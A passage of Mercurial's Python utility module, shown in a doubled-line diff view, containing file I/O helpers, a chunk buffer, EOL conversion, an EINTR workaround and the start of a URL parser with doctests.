2257 try:
2257 makedir(name, notindexed)
2258 makedir(name, notindexed)
2258 except OSError as err:
2259 except OSError as err:
2259 if err.errno == errno.EEXIST:
2260 if err.errno == errno.EEXIST:
2260 return
2261 return
2261 if err.errno != errno.ENOENT or not name:
2262 if err.errno != errno.ENOENT or not name:
2262 raise
2263 raise
2263 parent = os.path.dirname(os.path.abspath(name))
2264 parent = os.path.dirname(os.path.abspath(name))
2264 if parent == name:
2265 if parent == name:
2265 raise
2266 raise
2266 makedirs(parent, mode, notindexed)
2267 makedirs(parent, mode, notindexed)
2267 try:
2268 try:
2268 makedir(name, notindexed)
2269 makedir(name, notindexed)
2269 except OSError as err:
2270 except OSError as err:
2270 # Catch EEXIST to handle races
2271 # Catch EEXIST to handle races
2271 if err.errno == errno.EEXIST:
2272 if err.errno == errno.EEXIST:
2272 return
2273 return
2273 raise
2274 raise
2274 if mode is not None:
2275 if mode is not None:
2275 os.chmod(name, mode)
2276 os.chmod(name, mode)
2276
2277
2277 def readfile(path):
2278 def readfile(path):
2278 with open(path, 'rb') as fp:
2279 with open(path, 'rb') as fp:
2279 return fp.read()
2280 return fp.read()
2280
2281
2281 def writefile(path, text):
2282 def writefile(path, text):
2282 with open(path, 'wb') as fp:
2283 with open(path, 'wb') as fp:
2283 fp.write(text)
2284 fp.write(text)
2284
2285
2285 def appendfile(path, text):
2286 def appendfile(path, text):
2286 with open(path, 'ab') as fp:
2287 with open(path, 'ab') as fp:
2287 fp.write(text)
2288 fp.write(text)
2288
2289
2289 class chunkbuffer(object):
2290 class chunkbuffer(object):
2290 """Allow arbitrary sized chunks of data to be efficiently read from an
2291 """Allow arbitrary sized chunks of data to be efficiently read from an
2291 iterator over chunks of arbitrary size."""
2292 iterator over chunks of arbitrary size."""
2292
2293
2293 def __init__(self, in_iter):
2294 def __init__(self, in_iter):
2294 """in_iter is the iterator that's iterating over the input chunks."""
2295 """in_iter is the iterator that's iterating over the input chunks."""
2295 def splitbig(chunks):
2296 def splitbig(chunks):
2296 for chunk in chunks:
2297 for chunk in chunks:
2297 if len(chunk) > 2**20:
2298 if len(chunk) > 2**20:
2298 pos = 0
2299 pos = 0
2299 while pos < len(chunk):
2300 while pos < len(chunk):
2300 end = pos + 2 ** 18
2301 end = pos + 2 ** 18
2301 yield chunk[pos:end]
2302 yield chunk[pos:end]
2302 pos = end
2303 pos = end
2303 else:
2304 else:
2304 yield chunk
2305 yield chunk
2305 self.iter = splitbig(in_iter)
2306 self.iter = splitbig(in_iter)
2306 self._queue = collections.deque()
2307 self._queue = collections.deque()
2307 self._chunkoffset = 0
2308 self._chunkoffset = 0
2308
2309
2309 def read(self, l=None):
2310 def read(self, l=None):
2310 """Read L bytes of data from the iterator of chunks of data.
2311 """Read L bytes of data from the iterator of chunks of data.
2311 Returns less than L bytes if the iterator runs dry.
2312 Returns less than L bytes if the iterator runs dry.
2312
2313
2313 If size parameter is omitted, read everything"""
2314 If size parameter is omitted, read everything"""
2314 if l is None:
2315 if l is None:
2315 return ''.join(self.iter)
2316 return ''.join(self.iter)
2316
2317
2317 left = l
2318 left = l
2318 buf = []
2319 buf = []
2319 queue = self._queue
2320 queue = self._queue
2320 while left > 0:
2321 while left > 0:
2321 # refill the queue
2322 # refill the queue
2322 if not queue:
2323 if not queue:
2323 target = 2**18
2324 target = 2**18
2324 for chunk in self.iter:
2325 for chunk in self.iter:
2325 queue.append(chunk)
2326 queue.append(chunk)
2326 target -= len(chunk)
2327 target -= len(chunk)
2327 if target <= 0:
2328 if target <= 0:
2328 break
2329 break
2329 if not queue:
2330 if not queue:
2330 break
2331 break
2331
2332
2332 # The easy way to do this would be to queue.popleft(), modify the
2333 # The easy way to do this would be to queue.popleft(), modify the
2333 # chunk (if necessary), then queue.appendleft(). However, for cases
2334 # chunk (if necessary), then queue.appendleft(). However, for cases
2334 # where we read partial chunk content, this incurs 2 dequeue
2335 # where we read partial chunk content, this incurs 2 dequeue
2335 # mutations and creates a new str for the remaining chunk in the
2336 # mutations and creates a new str for the remaining chunk in the
2336 # queue. Our code below avoids this overhead.
2337 # queue. Our code below avoids this overhead.
2337
2338
2338 chunk = queue[0]
2339 chunk = queue[0]
2339 chunkl = len(chunk)
2340 chunkl = len(chunk)
2340 offset = self._chunkoffset
2341 offset = self._chunkoffset
2341
2342
2342 # Use full chunk.
2343 # Use full chunk.
2343 if offset == 0 and left >= chunkl:
2344 if offset == 0 and left >= chunkl:
2344 left -= chunkl
2345 left -= chunkl
2345 queue.popleft()
2346 queue.popleft()
2346 buf.append(chunk)
2347 buf.append(chunk)
2347 # self._chunkoffset remains at 0.
2348 # self._chunkoffset remains at 0.
2348 continue
2349 continue
2349
2350
2350 chunkremaining = chunkl - offset
2351 chunkremaining = chunkl - offset
2351
2352
2352 # Use all of unconsumed part of chunk.
2353 # Use all of unconsumed part of chunk.
2353 if left >= chunkremaining:
2354 if left >= chunkremaining:
2354 left -= chunkremaining
2355 left -= chunkremaining
2355 queue.popleft()
2356 queue.popleft()
2356 # offset == 0 is enabled by block above, so this won't merely
2357 # offset == 0 is enabled by block above, so this won't merely
2357 # copy via ``chunk[0:]``.
2358 # copy via ``chunk[0:]``.
2358 buf.append(chunk[offset:])
2359 buf.append(chunk[offset:])
2359 self._chunkoffset = 0
2360 self._chunkoffset = 0
2360
2361
2361 # Partial chunk needed.
2362 # Partial chunk needed.
2362 else:
2363 else:
2363 buf.append(chunk[offset:offset + left])
2364 buf.append(chunk[offset:offset + left])
2364 self._chunkoffset += left
2365 self._chunkoffset += left
2365 left -= chunkremaining
2366 left -= chunkremaining
2366
2367
2367 return ''.join(buf)
2368 return ''.join(buf)
2368
2369
2369 def filechunkiter(f, size=131072, limit=None):
2370 def filechunkiter(f, size=131072, limit=None):
2370 """Create a generator that produces the data in the file size
2371 """Create a generator that produces the data in the file size
2371 (default 131072) bytes at a time, up to optional limit (default is
2372 (default 131072) bytes at a time, up to optional limit (default is
2372 to read all data). Chunks may be less than size bytes if the
2373 to read all data). Chunks may be less than size bytes if the
2373 chunk is the last chunk in the file, or the file is a socket or
2374 chunk is the last chunk in the file, or the file is a socket or
2374 some other type of file that sometimes reads less data than is
2375 some other type of file that sometimes reads less data than is
2375 requested."""
2376 requested."""
2376 assert size >= 0
2377 assert size >= 0
2377 assert limit is None or limit >= 0
2378 assert limit is None or limit >= 0
2378 while True:
2379 while True:
2379 if limit is None:
2380 if limit is None:
2380 nbytes = size
2381 nbytes = size
2381 else:
2382 else:
2382 nbytes = min(limit, size)
2383 nbytes = min(limit, size)
2383 s = nbytes and f.read(nbytes)
2384 s = nbytes and f.read(nbytes)
2384 if not s:
2385 if not s:
2385 break
2386 break
2386 if limit:
2387 if limit:
2387 limit -= len(s)
2388 limit -= len(s)
2388 yield s
2389 yield s
2389
2390
2390 class cappedreader(object):
2391 class cappedreader(object):
2391 """A file object proxy that allows reading up to N bytes.
2392 """A file object proxy that allows reading up to N bytes.
2392
2393
2393 Given a source file object, instances of this type allow reading up to
2394 Given a source file object, instances of this type allow reading up to
2394 N bytes from that source file object. Attempts to read past the allowed
2395 N bytes from that source file object. Attempts to read past the allowed
2395 limit are treated as EOF.
2396 limit are treated as EOF.
2396
2397
2397 It is assumed that I/O is not performed on the original file object
2398 It is assumed that I/O is not performed on the original file object
2398 in addition to I/O that is performed by this instance. If there is,
2399 in addition to I/O that is performed by this instance. If there is,
2399 state tracking will get out of sync and unexpected results will ensue.
2400 state tracking will get out of sync and unexpected results will ensue.
2400 """
2401 """
2401 def __init__(self, fh, limit):
2402 def __init__(self, fh, limit):
2402 """Allow reading up to <limit> bytes from <fh>."""
2403 """Allow reading up to <limit> bytes from <fh>."""
2403 self._fh = fh
2404 self._fh = fh
2404 self._left = limit
2405 self._left = limit
2405
2406
2406 def read(self, n=-1):
2407 def read(self, n=-1):
2407 if not self._left:
2408 if not self._left:
2408 return b''
2409 return b''
2409
2410
2410 if n < 0:
2411 if n < 0:
2411 n = self._left
2412 n = self._left
2412
2413
2413 data = self._fh.read(min(n, self._left))
2414 data = self._fh.read(min(n, self._left))
2414 self._left -= len(data)
2415 self._left -= len(data)
2415 assert self._left >= 0
2416 assert self._left >= 0
2416
2417
2417 return data
2418 return data
2418
2419
2419 def readinto(self, b):
2420 def readinto(self, b):
2420 res = self.read(len(b))
2421 res = self.read(len(b))
2421 if res is None:
2422 if res is None:
2422 return None
2423 return None
2423
2424
2424 b[0:len(res)] = res
2425 b[0:len(res)] = res
2425 return len(res)
2426 return len(res)
2426
2427
2427 def unitcountfn(*unittable):
2428 def unitcountfn(*unittable):
2428 '''return a function that renders a readable count of some quantity'''
2429 '''return a function that renders a readable count of some quantity'''
2429
2430
2430 def go(count):
2431 def go(count):
2431 for multiplier, divisor, format in unittable:
2432 for multiplier, divisor, format in unittable:
2432 if abs(count) >= divisor * multiplier:
2433 if abs(count) >= divisor * multiplier:
2433 return format % (count / float(divisor))
2434 return format % (count / float(divisor))
2434 return unittable[-1][2] % count
2435 return unittable[-1][2] % count
2435
2436
2436 return go
2437 return go
2437
2438
2438 def processlinerange(fromline, toline):
2439 def processlinerange(fromline, toline):
2439 """Check that linerange <fromline>:<toline> makes sense and return a
2440 """Check that linerange <fromline>:<toline> makes sense and return a
2440 0-based range.
2441 0-based range.
2441
2442
2442 >>> processlinerange(10, 20)
2443 >>> processlinerange(10, 20)
2443 (9, 20)
2444 (9, 20)
2444 >>> processlinerange(2, 1)
2445 >>> processlinerange(2, 1)
2445 Traceback (most recent call last):
2446 Traceback (most recent call last):
2446 ...
2447 ...
2447 ParseError: line range must be positive
2448 ParseError: line range must be positive
2448 >>> processlinerange(0, 5)
2449 >>> processlinerange(0, 5)
2449 Traceback (most recent call last):
2450 Traceback (most recent call last):
2450 ...
2451 ...
2451 ParseError: fromline must be strictly positive
2452 ParseError: fromline must be strictly positive
2452 """
2453 """
2453 if toline - fromline < 0:
2454 if toline - fromline < 0:
2454 raise error.ParseError(_("line range must be positive"))
2455 raise error.ParseError(_("line range must be positive"))
2455 if fromline < 1:
2456 if fromline < 1:
2456 raise error.ParseError(_("fromline must be strictly positive"))
2457 raise error.ParseError(_("fromline must be strictly positive"))
2457 return fromline - 1, toline
2458 return fromline - 1, toline
2458
2459
2459 bytecount = unitcountfn(
2460 bytecount = unitcountfn(
2460 (100, 1 << 30, _('%.0f GB')),
2461 (100, 1 << 30, _('%.0f GB')),
2461 (10, 1 << 30, _('%.1f GB')),
2462 (10, 1 << 30, _('%.1f GB')),
2462 (1, 1 << 30, _('%.2f GB')),
2463 (1, 1 << 30, _('%.2f GB')),
2463 (100, 1 << 20, _('%.0f MB')),
2464 (100, 1 << 20, _('%.0f MB')),
2464 (10, 1 << 20, _('%.1f MB')),
2465 (10, 1 << 20, _('%.1f MB')),
2465 (1, 1 << 20, _('%.2f MB')),
2466 (1, 1 << 20, _('%.2f MB')),
2466 (100, 1 << 10, _('%.0f KB')),
2467 (100, 1 << 10, _('%.0f KB')),
2467 (10, 1 << 10, _('%.1f KB')),
2468 (10, 1 << 10, _('%.1f KB')),
2468 (1, 1 << 10, _('%.2f KB')),
2469 (1, 1 << 10, _('%.2f KB')),
2469 (1, 1, _('%.0f bytes')),
2470 (1, 1, _('%.0f bytes')),
2470 )
2471 )
2471
2472
2472 class transformingwriter(object):
2473 class transformingwriter(object):
2473 """Writable file wrapper to transform data by function"""
2474 """Writable file wrapper to transform data by function"""
2474
2475
2475 def __init__(self, fp, encode):
2476 def __init__(self, fp, encode):
2476 self._fp = fp
2477 self._fp = fp
2477 self._encode = encode
2478 self._encode = encode
2478
2479
2479 def close(self):
2480 def close(self):
2480 self._fp.close()
2481 self._fp.close()
2481
2482
2482 def flush(self):
2483 def flush(self):
2483 self._fp.flush()
2484 self._fp.flush()
2484
2485
2485 def write(self, data):
2486 def write(self, data):
2486 return self._fp.write(self._encode(data))
2487 return self._fp.write(self._encode(data))
2487
2488
2488 # Matches a single EOL which can either be a CRLF where repeated CR
2489 # Matches a single EOL which can either be a CRLF where repeated CR
2489 # are removed or a LF. We do not care about old Macintosh files, so a
2490 # are removed or a LF. We do not care about old Macintosh files, so a
2490 # stray CR is an error.
2491 # stray CR is an error.
2491 _eolre = remod.compile(br'\r*\n')
2492 _eolre = remod.compile(br'\r*\n')
2492
2493
2493 def tolf(s):
2494 def tolf(s):
2494 return _eolre.sub('\n', s)
2495 return _eolre.sub('\n', s)
2495
2496
2496 def tocrlf(s):
2497 def tocrlf(s):
2497 return _eolre.sub('\r\n', s)
2498 return _eolre.sub('\r\n', s)
2498
2499
2499 def _crlfwriter(fp):
2500 def _crlfwriter(fp):
2500 return transformingwriter(fp, tocrlf)
2501 return transformingwriter(fp, tocrlf)
2501
2502
2502 if pycompat.oslinesep == '\r\n':
2503 if pycompat.oslinesep == '\r\n':
2503 tonativeeol = tocrlf
2504 tonativeeol = tocrlf
2504 fromnativeeol = tolf
2505 fromnativeeol = tolf
2505 nativeeolwriter = _crlfwriter
2506 nativeeolwriter = _crlfwriter
2506 else:
2507 else:
2507 tonativeeol = pycompat.identity
2508 tonativeeol = pycompat.identity
2508 fromnativeeol = pycompat.identity
2509 fromnativeeol = pycompat.identity
2509 nativeeolwriter = pycompat.identity
2510 nativeeolwriter = pycompat.identity
2510
2511
2511 if (pyplatform.python_implementation() == 'CPython' and
2512 if (pyplatform.python_implementation() == 'CPython' and
2512 sys.version_info < (3, 0)):
2513 sys.version_info < (3, 0)):
2513 # There is an issue in CPython that some IO methods do not handle EINTR
2514 # There is an issue in CPython that some IO methods do not handle EINTR
2514 # correctly. The following table shows what CPython version (and functions)
2515 # correctly. The following table shows what CPython version (and functions)
2515 # are affected (buggy: has the EINTR bug, okay: otherwise):
2516 # are affected (buggy: has the EINTR bug, okay: otherwise):
2516 #
2517 #
2517 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2518 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2518 # --------------------------------------------------
2519 # --------------------------------------------------
2519 # fp.__iter__ | buggy | buggy | okay
2520 # fp.__iter__ | buggy | buggy | okay
2520 # fp.read* | buggy | okay [1] | okay
2521 # fp.read* | buggy | okay [1] | okay
2521 #
2522 #
2522 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2523 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2523 #
2524 #
2524 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2525 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2525 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2526 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2526 #
2527 #
2527 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2528 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2528 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2529 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2529 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2530 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2530 # fp.__iter__ but not other fp.read* methods.
2531 # fp.__iter__ but not other fp.read* methods.
2531 #
2532 #
2532 # On modern systems like Linux, the "read" syscall cannot be interrupted
2533 # On modern systems like Linux, the "read" syscall cannot be interrupted
2533 # when reading "fast" files like on-disk files. So the EINTR issue only
2534 # when reading "fast" files like on-disk files. So the EINTR issue only
2534 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2535 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2535 # files approximately as "fast" files and use the fast (unsafe) code path,
2536 # files approximately as "fast" files and use the fast (unsafe) code path,
2536 # to minimize the performance impact.
2537 # to minimize the performance impact.
2537 if sys.version_info >= (2, 7, 4):
2538 if sys.version_info >= (2, 7, 4):
2538 # fp.readline deals with EINTR correctly, use it as a workaround.
2539 # fp.readline deals with EINTR correctly, use it as a workaround.
2539 def _safeiterfile(fp):
2540 def _safeiterfile(fp):
2540 return iter(fp.readline, '')
2541 return iter(fp.readline, '')
2541 else:
2542 else:
2542 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2543 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2543 # note: this may block longer than necessary because of bufsize.
2544 # note: this may block longer than necessary because of bufsize.
2544 def _safeiterfile(fp, bufsize=4096):
2545 def _safeiterfile(fp, bufsize=4096):
2545 fd = fp.fileno()
2546 fd = fp.fileno()
2546 line = ''
2547 line = ''
2547 while True:
2548 while True:
2548 try:
2549 try:
2549 buf = os.read(fd, bufsize)
2550 buf = os.read(fd, bufsize)
2550 except OSError as ex:
2551 except OSError as ex:
2551 # os.read only raises EINTR before any data is read
2552 # os.read only raises EINTR before any data is read
2552 if ex.errno == errno.EINTR:
2553 if ex.errno == errno.EINTR:
2553 continue
2554 continue
2554 else:
2555 else:
2555 raise
2556 raise
2556 line += buf
2557 line += buf
2557 if '\n' in buf:
2558 if '\n' in buf:
2558 splitted = line.splitlines(True)
2559 splitted = line.splitlines(True)
2559 line = ''
2560 line = ''
2560 for l in splitted:
2561 for l in splitted:
2561 if l[-1] == '\n':
2562 if l[-1] == '\n':
2562 yield l
2563 yield l
2563 else:
2564 else:
2564 line = l
2565 line = l
2565 if not buf:
2566 if not buf:
2566 break
2567 break
2567 if line:
2568 if line:
2568 yield line
2569 yield line
2569
2570
2570 def iterfile(fp):
2571 def iterfile(fp):
2571 fastpath = True
2572 fastpath = True
2572 if type(fp) is file:
2573 if type(fp) is file:
2573 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2574 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2574 if fastpath:
2575 if fastpath:
2575 return fp
2576 return fp
2576 else:
2577 else:
2577 return _safeiterfile(fp)
2578 return _safeiterfile(fp)
2578 else:
2579 else:
2579 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2580 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2580 def iterfile(fp):
2581 def iterfile(fp):
2581 return fp
2582 return fp
2582
2583
2583 def iterlines(iterator):
2584 def iterlines(iterator):
2584 for chunk in iterator:
2585 for chunk in iterator:
2585 for line in chunk.splitlines():
2586 for line in chunk.splitlines():
2586 yield line
2587 yield line
2587
2588
2588 def expandpath(path):
2589 def expandpath(path):
2589 return os.path.expanduser(os.path.expandvars(path))
2590 return os.path.expanduser(os.path.expandvars(path))
2590
2591
2591 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2592 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2592 """Return the result of interpolating items in the mapping into string s.
2593 """Return the result of interpolating items in the mapping into string s.
2593
2594
2594 prefix is a single character string, or a two character string with
2595 prefix is a single character string, or a two character string with
2595 a backslash as the first character if the prefix needs to be escaped in
2596 a backslash as the first character if the prefix needs to be escaped in
2596 a regular expression.
2597 a regular expression.
2597
2598
2598 fn is an optional function that will be applied to the replacement text
2599 fn is an optional function that will be applied to the replacement text
2599 just before replacement.
2600 just before replacement.
2600
2601
2601 escape_prefix is an optional flag that allows using doubled prefix for
2602 escape_prefix is an optional flag that allows using doubled prefix for
2602 its escaping.
2603 its escaping.
2603 """
2604 """
2604 fn = fn or (lambda s: s)
2605 fn = fn or (lambda s: s)
2605 patterns = '|'.join(mapping.keys())
2606 patterns = '|'.join(mapping.keys())
2606 if escape_prefix:
2607 if escape_prefix:
2607 patterns += '|' + prefix
2608 patterns += '|' + prefix
2608 if len(prefix) > 1:
2609 if len(prefix) > 1:
2609 prefix_char = prefix[1:]
2610 prefix_char = prefix[1:]
2610 else:
2611 else:
2611 prefix_char = prefix
2612 prefix_char = prefix
2612 mapping[prefix_char] = prefix_char
2613 mapping[prefix_char] = prefix_char
2613 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2614 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2614 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2615 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2615
2616
2616 def getport(port):
2617 def getport(port):
2617 """Return the port for a given network service.
2618 """Return the port for a given network service.
2618
2619
2619 If port is an integer, it's returned as is. If it's a string, it's
2620 If port is an integer, it's returned as is. If it's a string, it's
2620 looked up using socket.getservbyname(). If there's no matching
2621 looked up using socket.getservbyname(). If there's no matching
2621 service, error.Abort is raised.
2622 service, error.Abort is raised.
2622 """
2623 """
2623 try:
2624 try:
2624 return int(port)
2625 return int(port)
2625 except ValueError:
2626 except ValueError:
2626 pass
2627 pass
2627
2628
2628 try:
2629 try:
2629 return socket.getservbyname(pycompat.sysstr(port))
2630 return socket.getservbyname(pycompat.sysstr(port))
2630 except socket.error:
2631 except socket.error:
2631 raise error.Abort(_("no port number associated with service '%s'")
2632 raise error.Abort(_("no port number associated with service '%s'")
2632 % port)
2633 % port)
2633
2634
2634 class url(object):
2635 class url(object):
2635 r"""Reliable URL parser.
2636 r"""Reliable URL parser.
2636
2637
2637 This parses URLs and provides attributes for the following
2638 This parses URLs and provides attributes for the following
2638 components:
2639 components:
2639
2640
2640 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2641 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2641
2642
2642 Missing components are set to None. The only exception is
2643 Missing components are set to None. The only exception is
2643 fragment, which is set to '' if present but empty.
2644 fragment, which is set to '' if present but empty.
2644
2645
2645 If parsefragment is False, fragment is included in query. If
2646 If parsefragment is False, fragment is included in query. If
2646 parsequery is False, query is included in path. If both are
2647 parsequery is False, query is included in path. If both are
2647 False, both fragment and query are included in path.
2648 False, both fragment and query are included in path.
2648
2649
2649 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2650 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2650
2651
2651 Note that for backward compatibility reasons, bundle URLs do not
2652 Note that for backward compatibility reasons, bundle URLs do not
2652 take host names. That means 'bundle://../' has a path of '../'.
2653 take host names. That means 'bundle://../' has a path of '../'.
2653
2654
2654 Examples:
2655 Examples:
2655
2656
2656 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2657 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2657 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2658 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2658 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2659 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2659 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2660 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2660 >>> url(b'file:///home/joe/repo')
2661 >>> url(b'file:///home/joe/repo')
2661 <url scheme: 'file', path: '/home/joe/repo'>
2662 <url scheme: 'file', path: '/home/joe/repo'>
2662 >>> url(b'file:///c:/temp/foo/')
2663 >>> url(b'file:///c:/temp/foo/')
2663 <url scheme: 'file', path: 'c:/temp/foo/'>
2664 <url scheme: 'file', path: 'c:/temp/foo/'>
2664 >>> url(b'bundle:foo')
2665 >>> url(b'bundle:foo')
2665 <url scheme: 'bundle', path: 'foo'>
2666 <url scheme: 'bundle', path: 'foo'>
2666 >>> url(b'bundle://../foo')
2667 >>> url(b'bundle://../foo')
2667 <url scheme: 'bundle', path: '../foo'>
2668 <url scheme: 'bundle', path: '../foo'>
2668 >>> url(br'c:\foo\bar')
2669 >>> url(br'c:\foo\bar')
2669 <url path: 'c:\\foo\\bar'>
2670 <url path: 'c:\\foo\\bar'>
2670 >>> url(br'\\blah\blah\blah')
2671 >>> url(br'\\blah\blah\blah')
2671 <url path: '\\\\blah\\blah\\blah'>
2672 <url path: '\\\\blah\\blah\\blah'>
2672 >>> url(br'\\blah\blah\blah#baz')
2673 >>> url(br'\\blah\blah\blah#baz')
2673 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2674 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2674 >>> url(br'file:///C:\users\me')
2675 >>> url(br'file:///C:\users\me')
2675 <url scheme: 'file', path: 'C:\\users\\me'>
2676 <url scheme: 'file', path: 'C:\\users\\me'>
2676
2677
2677 Authentication credentials:
2678 Authentication credentials:
2678
2679
2679 >>> url(b'ssh://joe:xyz@x/repo')
2680 >>> url(b'ssh://joe:xyz@x/repo')
2680 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2681 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2681 >>> url(b'ssh://joe@x/repo')
2682 >>> url(b'ssh://joe@x/repo')
2682 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2683 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2683
2684
2684 Query strings and fragments:
2685 Query strings and fragments:
2685
2686
2686 >>> url(b'http://host/a?b#c')
2687 >>> url(b'http://host/a?b#c')
2687 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2688 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2688 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2689 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2689 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2690 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2690
2691
2691 Empty path:
2692 Empty path:
2692
2693
2693 >>> url(b'')
2694 >>> url(b'')
2694 <url path: ''>
2695 <url path: ''>
2695 >>> url(b'#a')
2696 >>> url(b'#a')
2696 <url path: '', fragment: 'a'>
2697 <url path: '', fragment: 'a'>
2697 >>> url(b'http://host/')
2698 >>> url(b'http://host/')
2698 <url scheme: 'http', host: 'host', path: ''>
2699 <url scheme: 'http', host: 'host', path: ''>
2699 >>> url(b'http://host/#a')
2700 >>> url(b'http://host/#a')
2700 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2701 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2701
2702
2702 Only scheme:
2703 Only scheme:
2703
2704
2704 >>> url(b'http:')
2705 >>> url(b'http:')
2705 <url scheme: 'http'>
2706 <url scheme: 'http'>
2706 """
2707 """
2707
2708
2708 _safechars = "!~*'()+"
2709 _safechars = "!~*'()+"
2709 _safepchars = "/!~*'()+:\\"
2710 _safepchars = "/!~*'()+:\\"
2710 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2711 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2711
2712
2712 def __init__(self, path, parsequery=True, parsefragment=True):
2713 def __init__(self, path, parsequery=True, parsefragment=True):
2713 # We slowly chomp away at path until we have only the path left
2714 # We slowly chomp away at path until we have only the path left
2714 self.scheme = self.user = self.passwd = self.host = None
2715 self.scheme = self.user = self.passwd = self.host = None
2715 self.port = self.path = self.query = self.fragment = None
2716 self.port = self.path = self.query = self.fragment = None
2716 self._localpath = True
2717 self._localpath = True
2717 self._hostport = ''
2718 self._hostport = ''
2718 self._origpath = path
2719 self._origpath = path
2719
2720
2720 if parsefragment and '#' in path:
2721 if parsefragment and '#' in path:
2721 path, self.fragment = path.split('#', 1)
2722 path, self.fragment = path.split('#', 1)
2722
2723
2723 # special case for Windows drive letters and UNC paths
2724 # special case for Windows drive letters and UNC paths
2724 if hasdriveletter(path) or path.startswith('\\\\'):
2725 if hasdriveletter(path) or path.startswith('\\\\'):
2725 self.path = path
2726 self.path = path
2726 return
2727 return
2727
2728
2728 # For compatibility reasons, we can't handle bundle paths as
2729 # For compatibility reasons, we can't handle bundle paths as
2729 # normal URLS
2730 # normal URLS
2730 if path.startswith('bundle:'):
2731 if path.startswith('bundle:'):
2731 self.scheme = 'bundle'
2732 self.scheme = 'bundle'
2732 path = path[7:]
2733 path = path[7:]
2733 if path.startswith('//'):
2734 if path.startswith('//'):
2734 path = path[2:]
2735 path = path[2:]
2735 self.path = path
2736 self.path = path
2736 return
2737 return
2737
2738
2738 if self._matchscheme(path):
2739 if self._matchscheme(path):
2739 parts = path.split(':', 1)
2740 parts = path.split(':', 1)
2740 if parts[0]:
2741 if parts[0]:
2741 self.scheme, path = parts
2742 self.scheme, path = parts
2742 self._localpath = False
2743 self._localpath = False
2743
2744
2744 if not path:
2745 if not path:
2745 path = None
2746 path = None
2746 if self._localpath:
2747 if self._localpath:
2747 self.path = ''
2748 self.path = ''
2748 return
2749 return
2749 else:
2750 else:
2750 if self._localpath:
2751 if self._localpath:
2751 self.path = path
2752 self.path = path
2752 return
2753 return
2753
2754
2754 if parsequery and '?' in path:
2755 if parsequery and '?' in path:
2755 path, self.query = path.split('?', 1)
2756 path, self.query = path.split('?', 1)
2756 if not path:
2757 if not path:
2757 path = None
2758 path = None
2758 if not self.query:
2759 if not self.query:
2759 self.query = None
2760 self.query = None
2760
2761
2761 # // is required to specify a host/authority
2762 # // is required to specify a host/authority
2762 if path and path.startswith('//'):
2763 if path and path.startswith('//'):
2763 parts = path[2:].split('/', 1)
2764 parts = path[2:].split('/', 1)
2764 if len(parts) > 1:
2765 if len(parts) > 1:
2765 self.host, path = parts
2766 self.host, path = parts
2766 else:
2767 else:
2767 self.host = parts[0]
2768 self.host = parts[0]
2768 path = None
2769 path = None
2769 if not self.host:
2770 if not self.host:
2770 self.host = None
2771 self.host = None
2771 # path of file:///d is /d
2772 # path of file:///d is /d
2772 # path of file:///d:/ is d:/, not /d:/
2773 # path of file:///d:/ is d:/, not /d:/
2773 if path and not hasdriveletter(path):
2774 if path and not hasdriveletter(path):
2774 path = '/' + path
2775 path = '/' + path
2775
2776
2776 if self.host and '@' in self.host:
2777 if self.host and '@' in self.host:
2777 self.user, self.host = self.host.rsplit('@', 1)
